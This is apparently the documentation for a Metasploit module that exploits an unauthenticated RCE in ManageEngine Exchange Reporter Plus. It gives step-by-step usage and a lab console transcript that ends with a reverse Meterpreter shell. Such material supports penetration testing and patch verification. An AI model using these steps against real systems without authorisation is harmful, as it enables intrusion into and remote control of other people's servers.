## Description
This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet.
Additional information can be viewed on https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/

## Verification Steps
[Exchange Reporter Plus 5216](https://mega.nz/#!XG5CTC5I!IuG91CbrcdcpQj4teYRiBWNwy9pULRkV69U3DQ6nCyU)

## Verification Steps

 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/windows/http/manageengine_adshacluster_rce`
 4. Do: `set rhost <ip>`
 5. Do: `check`
```
[*] Version: 5216
[+] 192.168.88.125:8181 The target is vulnerable.
```
 6. Do: `set lport <port>`
 7. Do: `set lhost <ip>`
 8. Do: `exploit`
 9. You should get a shell.


## Scenarios

### Exchange Reporter Plus 5216 on Windows Target
```                                                                                                                                    
msf > use exploit/windows/http/manageengine_adshacluster_rce
msf exploit(windows/http/manageengine_adshacluster_rce) > set rhost 192.168.88.125
rhost => 192.168.88.125
msf exploit(windows/http/manageengine_adshacluster_rce) > check

[*] Version: 5216
[+] 192.168.88.125:8181 The target is vulnerable.
msf exploit(windows/http/manageengine_adshacluster_rce) > set lport 1111
lport => 1111
msf exploit(windows/http/manageengine_adshacluster_rce) > set lhost 192.168.88.120
lhost => 192.168.88.120
msf exploit(windows/http/manageengine_adshacluster_rce) > exploit

[*] Started reverse TCP handler on 192.168.88.120:1111
[*] Sending stage (179779 bytes) to 192.168.88.125
[*] Meterpreter session 2 opened (192.168.88.120:1111 -> 192.168.88.125:49955) at 2018-07-02 18:58:01 +0200

meterpreter > sysinfo
Computer        : WIN10
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : pl_PL
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
```